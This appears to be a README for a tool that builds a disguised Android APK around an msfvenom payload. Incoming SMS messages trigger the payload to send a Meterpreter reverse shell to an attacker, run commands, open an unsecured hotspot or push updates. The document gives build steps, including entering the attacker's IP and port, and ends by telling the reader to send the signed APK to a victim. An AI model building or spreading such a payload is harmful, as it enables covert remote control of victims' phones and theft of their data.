Create the msfvenome android payload which will be triggered with the special sms and send meterpreter shell to the atacker. It consist of the following types features which can be triggerd by different sms.
- Check - To check whether the installed payload is working or not (display toast message for the incoming trigger sms)
- meterpreter-It send the meterpreter to the attacker
- terminal-open a terminal on mobile
- command-execute a command send in sms
- update- Update the paylod ( user is prompt for installing apk )
- hotspoton -start a hotspot
- hotspotnull - start a open hotspot
- hotspotoff - Turn off the hotspot
Creating custom payload:
- Give permission and run android-sms.sh
- select the option for -sms specific trigger to trigger meterpreter on specific sms -trigger for all sms to trigger meterpreter on all sms
- Enter the ip and port address
- To change the triggers ,change the MainBroadcastReceiver and replace corresponding values.Do not change the file elsewhere.
-eg. The sms to meterpreter shell will be of format
password option
goo.gl.ltRmUp +1428345602 - Final apk will be generated named signed.apk
- Send signed.apk to the victim and give autorun permission. Check and enjoy!